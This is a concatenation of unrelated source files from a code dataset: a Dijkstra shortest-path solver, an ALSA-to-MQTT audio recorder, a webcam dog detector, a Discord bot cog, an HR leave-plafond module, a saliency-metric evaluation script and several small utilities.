self.listaDeAdjacencias.update({origem: (adj_existentes + adj_nova)})\n            if self.get_b() == 0:\n                # also add the origin as an adjacency of the destination\n                adj_nova_reciproca = [(origem, peso)]\n                if destino in self.listaDeAdjacencias:\n                    adj_existentes = self.listaDeAdjacencias.get(aresta.get_destino()) # for the destination\n                    self.listaDeAdjacencias.update({destino: (adj_existentes + adj_nova_reciproca)})\n                else:\n                    self.listaDeAdjacencias.update({destino: adj_nova_reciproca})\n        else: # if the origin is not in the graph yet\n            self.listaDeAdjacencias.update({origem: adj_nova})\n            if self.get_b() == 0:\n                adj_nova_reciproca = [(origem, peso)]\n                if destino in self.listaDeAdjacencias:\n                    adj_existentes = self.listaDeAdjacencias.get(aresta.get_destino())\n                    self.listaDeAdjacencias.update({destino: (adj_existentes + adj_nova_reciproca)})\n                else: # if the destination is not there yet, just add it normally\n                    self.listaDeAdjacencias.update({destino: adj_nova_reciproca})\n\n    def dijkstra(self, vertice_inicial):\n        # Initialization\n        self.vertices_abertos.append(None) # invalidate vertices_abertos[0]\n        self.dt.append(INFINITY) # invalidate dt[0]\n        self.rot.append(-1) # invalidate rot[0]\n        for v in range(0, self.__n):\n            self.vertices_abertos.append(True)\n            self.dt.append(INFINITY)\n            self.rot.append(0)\n        self.dt[vertice_inicial.get_indice()] = 0\n        # Start of the algorithm\n        while len(self.vertices_fechados) != self.__n:\n            vertice_com_menor_dt = self.encontra_vertice_com_menor_dt_entre_os_abertos()\n            self.fecha_o_vertice(vertice_com_menor_dt)\n            self.adiciona_vertice_aos_fechados(vertice_com_menor_dt)\n            # self.vertices_abertos.pop(v) # remove vertex v from the open set.\n            vizinhos_abertos_do_vertice = self.obter_vizinhos_abertos_de(vertice_com_menor_dt)\n            if vizinhos_abertos_do_vertice is not None:\n                for vizinho, peso in vizinhos_abertos_do_vertice:\n                    if self.dt[vertice_com_menor_dt] + peso < self.dt[vizinho.get_indice()]:\n                        self.dt[vizinho.get_indice()] = self.dt[vertice_com_menor_dt] + peso\n                        self.rot[vizinho.get_indice()] = vertice_com_menor_dt\n\n    # inspect the computed distances of every open vertex\n    def 
encontra_vertice_com_menor_dt_entre_os_abertos(self):\n        dt_dos_abertos = []\n        for v in range(0, self.__n + 1): # collect the dt of every vertex that is still open\n            if self.vertices_abertos[v]:\n                dt_dos_abertos.append(self.dt[v]) # and store it in dt_dos_abertos\n        return self.dt.index(min(dt_dos_abertos)) # index of the vertex with the smallest dt\n\n    def obter_vizinhos_abertos_de(self, v):\n        vizinhos_abertos_de_v = []\n        adjacencias_do_vertice = self.obter_adjacencias(Vertice(v))\n        # print(f'Adjacencias de {v}: {adjacencias_do_vertice}')\n        if adjacencias_do_vertice is None:\n            return None\n        for v, p in adjacencias_do_vertice:\n            if self.vertice_esta_aberto(v.get_indice()):\n                vizinhos_abertos_de_v.append((v, p))\n        return vizinhos_abertos_de_v\n\n    def obter_adjacencias(self, vertice):\n        return self.listaDeAdjacencias.get(vertice)\n\n    def resposta_dijkstra_formatada(self):\n        vertice = 1\n        while vertice <= self.__n:\n            if self.rot[vertice] == 0: # origin\n                vertice += 1\n                continue\n            vertice_de_destino = vertice\n            # build the shortest-path structure\n            menor_caminho = [vertice_de_destino]\n            while vertice_de_destino != 0: # walk the rot vector back to the origin (from end to start)\n                vertice_de_destino = self.rot[vertice_de_destino] # update the destination vertex with its rot entry\n                if vertice_de_destino == 0: # do not insert: 0 is a placeholder for the origin\n                    break\n                menor_caminho.append(vertice_de_destino) # append its rot entry to the path structure\n            menor_caminho.reverse()\n            print(f'{vertice} ({self.dt[vertice]}):', end=' ')\n            imprime_menor_caminho_formatado(menor_caminho)\n            print('')\n            vertice += 1\n\n    def imprime_nmb_formatado(self):\n        if self.get_b() == 0:\n            texto = \"NÃO DIRECIONADO\"\n        else:\n            texto = \"DIRECIONADO\"\n        print(f'{self.get_n()} {self.get_m()} {texto}')\n\n    @classmethod\n    def imprime_lista_de_adjacencias_formatada(cls):\n        for origem in cls.listaDeAdjacencias:\n            for (destino, peso) in cls.listaDeAdjacencias.get(origem):\n                print(f'{origem.get_indice()} {destino.get_indice()} {peso}')\n\n    def imprime_lista_de_adjacencias_de(self, vertice):\n        print(f'Adjacencias do vertice {vertice}:')\n        for adj, peso in self.listaDeAdjacencias.get(vertice):\n            print(f'{adj} , peso: {peso}')\n\n    @classmethod\n    def obter_rot(cls):\n        return cls.rot\n\n\nclass Vertice:\n    def __init__(self, indice):\n        self.__indice = indice\n        # self.__nao_visitado = True\n\n    def __str__(self): # defines the informal string representation\n        return str(self.get_indice())\n\n    def __eq__(self, other): # defines equality between instances of this class\n        return self.get_indice() == other.get_indice()\n\n    def __hash__(self): # equal objects must hash equally so the adjacency dictionary works correctly\n        return hash((self.get_indice()))\n\n    def get_indice(self):\n        return self.__indice\n\n\nclass Aresta:\n    def __init__(self, origem, destino, peso):\n        self.__origem = origem\n        self.__destino = destino\n        self.__peso = peso\n\n    def get_origem(self):\n        return self.__origem\n\n    def get_destino(self):\n        return self.__destino\n\n    def get_peso(self):\n        return self.__peso\n\n\ndef imprime_menor_caminho_formatado(menor_caminho):\n    for v in menor_caminho:\n        print(f'{v}', end=' ')\n\n\n# Input\nplinha = input()\nelemen = plinha.split(' ')\n\nn = int(elemen.pop(0))\nm = int(elemen.pop(0))\nb = int(elemen.pop(0))\ni = int(elemen.pop(0))\n\ngrafo = Grafo(n, m, b)\n\nfor mlinha in range(0, m):\n    origem_destino_peso = input()\n    valores = origem_destino_peso.split(' ')\n    origem = int(valores.pop(0))\n    destino = 
int(valores.pop(0))\n peso = int(valores.pop(0))\n grafo.adionar_aresta(Aresta(Vertice(origem), Vertice(destino), peso))\n\ngrafo.dijkstra(Vertice(i))\ngrafo.resposta_dijkstra_formatada()\n","sub_path":"dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":7901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"488011911","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport sys\nimport time\nimport getopt\nimport pickle\nimport alsaaudio\nimport paho.mqtt.client as mqtt\n\ndef usage():\n print('usage: recorder.py [-d ] [-h ]', file=sys.stderr)\n sys.exit(2)\n\nclass AudioMessage:\n def __init__(self, type):\n self.msg_type = type\n self.audio = \"\"\n\ndef sendaudio(source, client, starttime):\n mtype = 0\n while mtype != 2:\n l, data = source.read()\n if l:\n msg = AudioMessage(mtype)\n msg.audio = data\n if mtype == 1 and time.time() - starttime > 5:\n mtype = 2\n\n client.publish('/signal', pickle.dumps(msg, 2))\n if mtype == 0:\n mtype = 1\n else:\n time.sleep(.001)\n\nif __name__ == '__main__':\n\n device = 'default'\n host = 'localhost'\n\n opts, args = getopt.getopt(sys.argv[1:], 'd:h:')\n for o, a in opts:\n if o == '-d':\n device = a\n print(\"Device is: \"+device)\n if o == '-h':\n host = a\n print(\"Host is: \"+host)\n\n # print str(args)\n if args:\n usage()\n\n client = mqtt.Client()\n client.connect(host, 1883, 60)\n\n # Open the device in nonblocking capture mode. The last argument could\n # just as well have been zero for blocking mode. Then we could have\n # left out the sleep call in the bottom of the loop\n inp = alsaaudio.PCM(alsaaudio.PCM_CAPTURE, alsaaudio.PCM_NONBLOCK, device=device)\n\n # Set attributes: Mono, 44100 Hz, 16 bit little endian samples\n inp.setchannels(1)\n inp.setrate(44100)\n inp.setformat(alsaaudio.PCM_FORMAT_S16_LE)\n\n # The period size controls the internal number of frames per period.\n # The significance of this parameter is documented in the ALSA api.\n # For our purposes, it is suficcient to know that reads from the device\n # will return this many frames. Each frame being 2 bytes long.\n # This means that the reads below will return either 320 bytes of data\n # or 0 bytes of data. 
The latter is possible because we are in nonblocking\n # mode.\n inp.setperiodsize(160)\n\n client.loop_start()\n\n loops = 500\n while loops > 0:\n loops -= 1\n # Read data from device\n time.sleep(5)\n sendaudio(inp, client, time.time())\n\n client.loop_stop()\n","sub_path":"django/audiotrappola/mqtt/recorder.py","file_name":"recorder.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"322191399","text":"import os \nfrom docx2pdf import convert\n\nfile_paths = [\n os.path.join(os.getcwd(), fname) for fname in os.listdir(\".\")\n if fname.endswith(\".docx\") and not fname.startswith(\"~$\")\n]\nprint(f\"Converting the following documents from .docx to .pdf:\\n\" + '\\n\\t'.join(file_paths))\nfor fpath in file_paths: \n convert(fpath, fpath.replace(\".docx\", \".pdf\"))","sub_path":"docx_to_pdf.py","file_name":"docx_to_pdf.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"36308248","text":"def genero(gen):\n i = True\n while i==True:\n if gen in (\"m\", \"masculino\"):\n msg = \"Masculino\"\n return msg\n elif gen in (\"f\", \"feminino\"):\n msg = \"Feminino\"\n return msg\n else:\n msg = \"Genero invalido, tente novamente!\"\n return msg\ngen = str(input(\"Informe seu sexo, sendo ele masculino/feminino: \"))\nprint (genero(gen))\n\n","sub_path":"decisao/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"63865891","text":"# Copyright 2016 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\nr\"\"\"Generate captions for images using default beam search parameters.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport math\nimport os\nimport glob\nimport sys\nimport json\nimport os.path as osp\nimport scipy\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nimport tensorflow as tf\nimport PIL.Image\nimport numpy as np\nsys.path.append('eval_att')\nfrom metrics import metrics\nimport glob\n\nfrom im2txt import configuration\nfrom im2txt import gradcam_wrapper\nfrom im2txt.inference_utils import vocabulary\n\ndef prepare_resize_saliency(grad_mask_2d, w, h):\n #grad_mask_2d_norm = grad_mask_2d / np.max(grad_mask_2d)\n #grad_mask_2d_upscaled = scipy.misc.imresize(grad_mask_2d_norm, (w, h), interp='bilinear', mode='F') \n #percentile = 99\n #vmax = np.percentile(grad_mask_2d_upscaled, percentile)\n #vmin = np.min(grad_mask_2d_upscaled)\n #mask_grayscale_upscaled = np.clip((grad_mask_2d_upscaled - vmin) / (vmax - vmin), 0, 1)\n grad_mask_2d_upscaled = scipy.misc.imresize(grad_mask_2d, (w, h), interp='bilinear', mode='F')\n return grad_mask_2d_upscaled 
#mask_grayscale_upscaled\n\ndef transparent_cmap(cmap, N=255):\n \"Copy colormap and set alpha values\"\n\n mycmap = cmap\n mycmap._init()\n mycmap._lut[:,-1] = np.linspace(0, 0.8, N+4)\n return mycmap\n\nFLAGS = tf.flags.FLAGS\n\ntf.flags.DEFINE_string(\"checkpoint_path\", \"\",\n \"Model checkpoint file or directory containing a \"\n \"model checkpoint file.\")\ntf.flags.DEFINE_string(\"vocab_file\", \"\", \"Text file containing the vocabulary.\")\ntf.flags.DEFINE_string(\"dump_file\", \"\", \"Text file containing the vocabulary.\")\n#tf.flags.DEFINE_string(\"input_files\", \"\",\n# \"File pattern or comma-separated list of file patterns \"\n# \"of image files.\")\ntf.flags.DEFINE_string(\"model_name\", \"\", \"Model name equivalebt to the JSON prediction file.\")\ntf.flags.DEFINE_string(\"img_path\", \"\", \"Text file containing image IDs.\")\ntf.flags.DEFINE_string(\"save_path\", \"\", \"Path to the location where outputs should be saved.\")\n\ntf.logging.set_verbosity(tf.logging.INFO)\n\ncoco_dir = 'im2txt/data/mscoco/'\ndataType = 'val2014'\ncocoImgDir = '{}/images/{}/'.format(coco_dir, dataType)\ncoco_masks = '{}/masks/{}/'.format(coco_dir, dataType)\n\nW = -1 # -1 8 32\nH = -1 # -1 8 32\n\nexclude = [] # 'man', 'woman', 'person'\n#exclude = ['_person']\n#exclude = ['_person', '_man']\n#exclude = ['_person', '_woman']\n#exclude = ['_man']\n#exclude = ['_woman']\n\ndef main(_):\n import ipdb\n #ipdb.set_trace()\n\n save_path = osp.join(FLAGS.save_path, osp.basename(FLAGS.model_name)+'_gt')\n\n # Create the vocabulary.\n vocab = vocabulary.Vocabulary(FLAGS.vocab_file)\n man_id = vocab.word_to_id('man')\n woman_id = vocab.word_to_id('woman')\n #person_id = vocab.word_to_id('person')\n\n of = open(FLAGS.img_path, 'r')\n image_ids = of.read().split('\\n')\n if image_ids[-1] == '':\n image_ids = image_ids[0:-1]\n\n json_path = 'im2txt/data/mscoco/annotations/captions_val2014.json'\n json_data = json.load(open(json_path, 'r'))\n json_dict = {}\n for entry in json_data['annotations']:\n image_id = entry['image_id']\n if str(image_id) not in image_ids: continue\n if image_id not in json_dict:\n caption = entry['caption']\n caption = caption.lower()\n tokens = caption.split(' ') \n if '-man' in FLAGS.img_path: look_for = 'man'\n elif '-woman' in FLAGS.img_path: look_for = 'woman'\n else: assert(False)\n if look_for in tokens:\n json_dict[image_id] = entry['caption']\n if len(json_dict) == 500: break\n\n image_ids = json_dict.keys()\n\n emd_sum = 0\n spear_sum = 0\n rank_sum = 0\n iou_sum = 0\n pointing_sum = 0\n\n global_count = 0\n for i, image_id in enumerate(image_ids):\n image_id = int(image_id)\n #sys.stdout.write('\\r%d/%d' %(i, len(image_ids)))\n filename = 'im2txt/data/mscoco/images/val2014/COCO_val2014_' + \"%012d\" % (image_id) +'.jpg'\n\n #input_image = PIL.Image.open(filename)\n #input_image = input_image.convert('RGB') \n #im = np.asarray(input_image)\n #im_resized = scipy.misc.imresize(im, (W, H), interp='bilinear', mode=None) \n #im_resized = im_resized / 127.5 - 1.0\n #w = im_resized.shape[0]\n #h = im_resized.shape[1]\n #y, x = np.mgrid[0:h, 0:w]\n #mycmap = transparent_cmap(plt.cm.jet)\n\n coco_mask_file = '%s/COCO_%s_%012d.npy' %(coco_masks, dataType, image_id)\n coco_mask = np.load(coco_mask_file)\n if np.sum(coco_mask) == 0: \n # no person mask\n continue\n if W > 0:\n coco_mask_resized = scipy.misc.imresize(coco_mask, (W, H), interp='bilinear', mode=None)\n coco_mask_resized_notnormalized = coco_mask_resized.copy()\n coco_mask_resized_notnormalized = 
coco_mask_resized_notnormalized / 255.0\n coco_mask_resized = coco_mask_resized / float(np.sum(coco_mask_resized))\n\n #fig = plt.figure(frameon=False)\n #plt.imshow(coco_mask_resized)\n #plt.show()\n #plt.close()\n\n if image_id not in json_dict: \n continue\n caption = json_dict[image_id]\n caption = caption.lower()\n #print(caption)\n if caption[-1] == '.':\n caption = caption[0:-1] \n tokens = caption.split(' ')\n tokens.insert(0, '')\n encoded_tokens = [vocab.word_to_id(w) for w in tokens]\n man_ids = [i for i, c in enumerate(encoded_tokens) if c == man_id]\n woman_ids = [i for i, c in enumerate(encoded_tokens) if c == woman_id]\n #person_ids = [i for i, c in enumerate(encoded_tokens) if c == person_id]\n if not (man_ids or woman_ids): #or person_ids):\n # nothing to do\n continue\n else:\n files = glob.glob(save_path + \"/*COCO_val2014_\" + \"%012d*.npy\" % (image_id))\n for f in files:\n gradcam_file = f\n exclude_file = False\n for w in exclude:\n if w in gradcam_file:\n exclude_file = True\n break\n if exclude_file: continue\n saliency_mask = np.load(gradcam_file)\n if W > 0:\n mask_grayscale_upscaled = prepare_resize_saliency(saliency_mask, W, H)\n mask_grayscale_upscaled = mask_grayscale_upscaled / float(np.sum(mask_grayscale_upscaled))\n met = metrics.heatmap_metrics(coco_mask_resized,\n mask_grayscale_upscaled,\n gt_type='human', SIZE=(W,H))\n met_notnormalized = metrics.heatmap_metrics(coco_mask_resized_notnormalized,\n mask_grayscale_upscaled,\n gt_type='human', SIZE=(W,H))\n else:\n mask_grayscale_upscaled = prepare_resize_saliency(saliency_mask, coco_mask.shape[0], coco_mask.shape[1])\n mask_grayscale_upscaled = mask_grayscale_upscaled / float(np.sum(mask_grayscale_upscaled))\n met = metrics.heatmap_metrics(coco_mask,\n mask_grayscale_upscaled,\n gt_type='human', SIZE=coco_mask.shape)\n\n # Compute EMD\n if W>0 and W<16:\n emd_mean_score, emd_scores = met.earth_mover(distance='euclidean')\n emd_sum += emd_mean_score\n # Compute Spearman\n if W>0:\n spear_mean_score, spear_scores = met.spearman_correlation()\n spear_sum += spear_mean_score\n # Compute Rank correlation\n if W>0:\n rank_mean_score = met.mean_rank_correlation()\n rank_sum += rank_mean_score\n # Compute IOU\n if W>0:\n mean_iou = met_notnormalized.iou()\n iou_sum += mean_iou\n # pointing\n if W<0:\n #import ipdb; ipdb.set_trace()\n pointing_sum += met.pointing()#coco_mask.flatten()[np.argmax(mask_grayscale_upscaled.flatten())]\n global_count += 1\n print(\"\\ncount: %d\" % (global_count))\n #print(\"EMD: %.3f\" % float(emd_sum/global_count))\n #print(\"SPEAR: %.5f\" % float(spear_sum/global_count))\n #print(\"rank: %.5f\" % float(rank_sum/global_count))\n #print(\"iou: %.8f\" % float(iou_sum/global_count))\n print(\"pointing: %.3f\" % float(pointing_sum/global_count))\n #print(\"%.3f\\t%.5f\\t%.5f\\t%.8f\\t%d\" % (float(emd_sum/global_count), float(spear_sum/global_count),\n # float(rank_sum/global_count), float(iou_sum/global_count), global_count))\n\nif __name__ == \"__main__\":\n tf.app.run()\n","sub_path":"research/im2txt/im2txt/evaluate_saliency_with_gt.py","file_name":"evaluate_saliency_with_gt.py","file_ext":"py","file_size_in_byte":9016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"575004602","text":"\nimport cv2\nimport numpy as np\nimport math\nimport os\nimport sys\nimport datetime\nfrom PIL import Image\nsys.path.append('..')\nfrom cnn_detector.detector import Detector\nfrom cnn_detector.dnn_network import NetworkType\nimport tflearn\nimport 
time\n\n\nclass DogDetector():\n model_dir = 'models'\n # filename = 'cropped_dog_112_lenet_detector_112-112_100_128_lenet.model'\n # image_size = (112, 112)\n n_epoch = 100\n batch_size = 128\n threshold = 0.9\n\n def __init__(self):\n network_type = NetworkType.lenet.name\n # network_type = NetworkType.alex.name\n image_size = 112\n self.image_size = (image_size, image_size)\n detector = Detector(**{\n # 'filename': self.filename,\n 'run_id': 'cropped_dog_{}_{}_detector'.format(\n image_size, network_type),\n 'n_epoch': self.n_epoch,\n 'batch_size': self.batch_size,\n 'image_size': self.image_size,\n 'tensorboard_dir': 'tensorboard_log',\n 'checkpoint_dir': 'checkpoints',\n 'network_type': network_type})\n self.model = detector.load_model()\n # self.model = detector.generate_network()\n # self.model.load(\"{}/{}\".format(self.model_dir, self.filename))\n\n def detect(self, image: np.array):\n \"\"\" Detect dog from image.\n\n Args:\n image:\n\n Returns:\n\n \"\"\"\n image = Image.fromarray(image)\n image = Detector.center_crop(image)\n image = image.resize(self.image_size)\n pred_Y = self.model.predict([image])\n if pred_Y[0][0] > 0.5:\n print(pred_Y)\n if pred_Y[0][0] > self.threshold:\n print(\"Dog detected!\")\n return True\n else:\n return False\n\n def save(self, image: np.array):\n \"\"\" Save dog image.\n\n Args:\n image:\n\n Returns:\n\n \"\"\"\n print(\"Save dog image.\")\n cv2.imwrite('detected/detected_dog_{}.jpg'.format(\n datetime.datetime.now()), image)\n # image.save('detected/detected_dog_{}.jpg'.format(\n # datetime.datetime.now()\n # ))\n\n def capture(self):\n \"\"\" Capture image from webcam..\n\n Returns:\n\n \"\"\"\n video_capture = cv2.VideoCapture(0)\n WIDTH = 320\n HEIGHT = 240\n video_capture.set(cv2.CAP_PROP_FRAME_WIDTH, WIDTH)\n video_capture.set(cv2.CAP_PROP_FRAME_HEIGHT, HEIGHT)\n ex_detected = False\n continuous_detected_num = 0\n skipped_num = 0\n while True:\n time.sleep(0.5)\n ret, frame = video_capture.read()\n # cv2.imshow('frame', frame)\n\n detected = self.detect(frame)\n # Continuous detect management.\n if ex_detected and detected:\n continuous_detected_num += 1\n print(\"Dog continuous detected: {}\".format(\n continuous_detected_num))\n elif ex_detected or detected:\n pass\n else:\n continuous_detected_num = 0\n ex_detected = detected\n # Save skip management.\n if continuous_detected_num != 0 \\\n and math.fmod(math.log(continuous_detected_num, 2), 1) != 0:\n skipped_num += 1\n print(\"Skip saving: {}\".format(skipped_num))\n continue\n else:\n skipped_num = 0\n if detected:\n self.save(frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n video_capture.release()\n cv2.destroyAllWindows()\n\n\n\nif __name__ == '__main__':\n dog_detector = DogDetector()\n\n # image = Image.open('imgs/abyssinian_24.jpg')\n # dog_detector.detect(image)\n dog_detector.capture()\n\n\n","sub_path":"Detection/dog_detector/dog_detector.py","file_name":"dog_detector.py","file_ext":"py","file_size_in_byte":3811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"488555371","text":"import discord\nimport logging\nimport random\nfrom discord.ext import commands\n\n\nclass WhatCog(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n self.logger = logging.getLogger(__name__)\n\n @staticmethod\n async def get_previous_message(message: discord.Message):\n found = False\n tmp_msg = None\n async for msg in message.channel.history(limit=10):\n if found:\n tmp_msg = msg\n break\n if msg.content == message.content 
and msg.author == message.author:\n found = True\n\n return tmp_msg if found else None\n\n @staticmethod\n def has_embed(message: discord.Message):\n return len(message.embeds) > 0 or len(message.attachments) > 0\n\n @commands.Cog.listener()\n async def on_message(self, message):\n if message.author.id == 278888022555230208:\n return\n if message.content.strip().lower() == \"what\":\n previous = await self.get_previous_message(message)\n if previous is None:\n return\n if self.has_embed(previous):\n print('previous had embed')\n return\n else:\n # randomize it\n if random.random() > 0.2:\n return\n # normal code again\n msg = previous.content.replace('***', '').replace('**', '')\n msg = f'**{msg}**'.upper()\n await message.channel.send(msg)\n self.logger.info('%s - %s whatted in channel '\n '%s - %s. Content: %s' %\n (message.author,\n message.author.id,\n message.channel,\n message.channel.id,\n msg))\n\n\ndef setup(bot):\n bot.add_cog(WhatCog(bot))\n","sub_path":"cogs/what.py","file_name":"what.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"596849920","text":"import com.ihsan.foundation.pobjecthelper as phelper\nimport time, sys, os\n\ndef FormSetDataEx(uideflist,parameters):\n config = uideflist.config\n PeranLogin = config.SecurityContext.GetUserInfo()[7].replace('\\n',\"','\")\n UserLogin = config.SecurityContext.InitUser\n\n sSQL = \"select employeeid from logincorporate where upper(login)='%s'\" % UserLogin\n useremployee = config.CreateSQL(sSQL).RawResult\n employeeid = useremployee.employeeid or ''\n\n uip = uideflist.uipart\n rec = uip.Dataset.AddRecord()\n rec.peran = \"'%s'\" % PeranLogin\n rec.empid = employeeid\n\ndef Reset(config,params,returnpacket):\n status = returnpacket.CreateValues(\n ['IsErr',0],\n ['ErrMessage',''],\n )\n recParam = params.FirstRecord\n config.BeginTransaction()\n try:\n sSQL = \"UPDATE offworkplafond SET previousyearplafond=0, ispreviousallowancetaken='T'\"\n res = config.ExecSQL(sSQL)\n\n config.Commit()\n except:\n config.Rollback()\n status.IsErr = 1\n status.ErrMessage = str(sys.exc_info()[1])\n\n\ndef RefreshPlafond(config,params,returnpacket):\n status = returnpacket.CreateValues(\n ['IsErr',0],\n ['ErrMessage',''],\n )\n recParam = params.FirstRecord\n config.BeginTransaction()\n def EncodeTgl(ED):\n tanggal =config.ModLibUtils.EncodeDate(int(ED[0]),int(ED[1]),int(ED[2]))\n return tanggal\n\n try:\n Emp =\"SELECT b.employeeid as empid,a.employeeid as NIK,a.employeeentrydate,b.currentyear,b.cutibesarbegin \"\n Emp +=\" FROM employee a LEFT OUTER JOIN offworkplafond b ON a.employeeid=b.employeeid WHERE a.isactive ='T' order by b.currentyear\"\n EFY = config.CreateSQL(Emp).RawResult\n EFY.First()\n\n tahun=EFY.currentyear\n TahunIni =config.Now()\n while not EFY.Eof:\n empid =EFY.empid\n tglmasuk = EncodeTgl(EFY.employeeentrydate)\n bulan = config.FormatDateTime('MM',tglmasuk)\n bln =12 - int(bulan)\n\n selisih = int((TahunIni-tglmasuk) / 365)\n if empid in (None,''):\n if (selisih >=1) and (selisih < 2):\n sSQL = \"insert into offworkplafond(employeeid,empid,currentyear,previousyearplafond,iscurrentallowancetaken,ispreviousallowancetaken, \"\n sSQL += \"iscutibesar, currentyearplafond,cutibesarbegin,allowance) VALUES ( \"\n sSQL += \"'%s','%s','%s',0,'F','T','T',%s,NULL,'(%s/12)*50' )\" % (EFY.NIK,EFY.NIK,tahun,bln,bln)\n\n res = config.ExecSQL(sSQL)\n\n EFY.Next()\n\n config.Commit()\n except:\n config.Rollback()\n status.IsErr = 1\n 
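# pass the exception text back to the caller through the return packet\n        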
status.ErrMessage = str(sys.exc_info()[1])\n\n","sub_path":"dialogs/parameter/QryPlafondCuti_data.py","file_name":"QryPlafondCuti_data.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"430534049","text":"import sys\n\nfilepath = '/home/jesseik/advent/1/input'\nfrequency = 0\nfrequencies = []\n\nwhile True:\n    with open(filepath) as f:\n        for line in f:\n            frequency += int(line)\n            if int(frequency) in frequencies:\n                print(\"found!\")\n                print(frequency)\n                sys.exit(0)\n\n            frequencies.append(int(frequency))\n","sub_path":"1/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"339423383","text":"import csv\n\n\nclasses={}\n\nwith open('/mnt/data/dataset_stuff/openimages/class-descriptions.csv', 'r') as f:\n    reader=csv.reader(f,delimiter=',')\n    for row in reader:\n        classes[row[0]]=row[1]\n\n\n\noutdata=\"\"\nlines=[]\nwith open('/mnt/data/dataset_stuff/openimages/classes-bbox-trainable.txt', 'r') as f:\n    for line in f.readlines():\n        dat=line.strip()\n        outdata += dat + \",\" + classes[dat] + \"\\n\"\n\n\n\n\nwith open('/mnt/data/dataset_stuff/openimages/classes-bbox-trainable_labels.csv', 'w') as f:\n    f.write(outdata)","sub_path":"tools/open_images_download.py","file_name":"open_images_download.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"171900008","text":"\"\"\" Adding fields in the declaration of a class and replacing them by a parsed\nvalue.\n\"\"\"\n\n\nfrom .six import add_metaclass, iteritems\n\n\nclass FieldsMeta(type):\n    \"\"\" Meta class allowing to configure fields at creation\n    \"\"\"\n\n    @classmethod\n    def __new__(cls, meta_class, cls_name, cls_proto, cls_dict):\n        try:\n            field_cls = cls_dict['__field_cls__']\n        except KeyError:\n            print(\"No field class defined, use the @fields class decorator.\")\n        else:\n            for key, value in iteritems(cls_dict):\n                if isinstance(value, field_cls):\n                    cls_dict[key] = value.parsed()\n\n        return super(FieldsMeta, cls).__new__(meta_class,\n                cls_name, cls_proto, cls_dict)\n\n\nclass Field(object):\n    \"\"\" Member of a class that gets parsed and linked to its parent class at\n    creation.\n    \"\"\"\n\n    def __init__(self):\n        super(Field, self).__init__()\n\n    def parsed(self):\n        raise NotImplementedError('You must implement the \"parsed\" method of ' +\n                'your fields.')\n\n\ndef fields(target_cls):\n    \"\"\" Class decorator to link a class and its fields.\n    \"\"\"\n    def wrapper(cls):\n        _add = add_metaclass(FieldsMeta)\n        cls.__field_cls__ = target_cls\n        return _add(cls)\n    return wrapper\n","sub_path":"pyutils/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"214615774","text":"from collections import OrderedDict\nfrom string import ascii_uppercase\n\nimport torch\nimport torch.nn as nn\nfrom abc import ABC, abstractmethod\n\nfrom assembly.constants import K_ACTIVE\nfrom assembly.samplers import sample_bernoulli\nfrom mighty.utils.common import find_layers\n\n__all__ = [\n    \"KWinnersTakeAll\",\n    \"AreaRNNHebb\",\n    \"AreaRNNWillshaw\",\n    \"AreaStack\",\n    \"AreaSequential\"\n]\n\n\nclass KWinnersTakeAll(nn.Module):\n    \"\"\"\n    K-winners-take-all activation function.\n\n    Parameters\n    ----------\n    k_active : 
int, optional\n `k`, the number of active (winner) neurons within an output layer.\n Default: 50\n \"\"\"\n def __init__(self, k_active=K_ACTIVE):\n super().__init__()\n self.k_active = k_active\n\n def forward(self, x):\n \"\"\"\n The forward pass of kWTA.\n\n Parameters\n ----------\n x : (N,) torch.Tensor\n An input vector.\n\n Returns\n -------\n y : (N,) torch.Tensor\n The output vector ``y = kwta(x)`` with exactly :attr:`k` active\n neurons.\n\n \"\"\"\n winners = x.topk(k=self.k_active, sorted=False).indices\n y = torch.zeros_like(x)\n y[winners] = 1\n return y\n\n def extra_repr(self):\n return f\"k_active={self.k_active}\"\n\n\nclass AreaInterface(nn.Module, ABC):\n def recall(self, xs_stim):\n \"\"\"\n A forward pass without latent activations.\n\n Parameters\n ----------\n xs_stim : torch.Tensor or tuple of torch.Tensor\n Input vectors from the incoming areas.\n\n Returns\n -------\n y_out : torch.Tensor\n The output vector.\n \"\"\"\n mode = self.training\n self.eval()\n y_out = self(xs_stim)\n self.train(mode)\n return y_out\n\n def complete_from_input(self, xs_partial, y_partial=None):\n 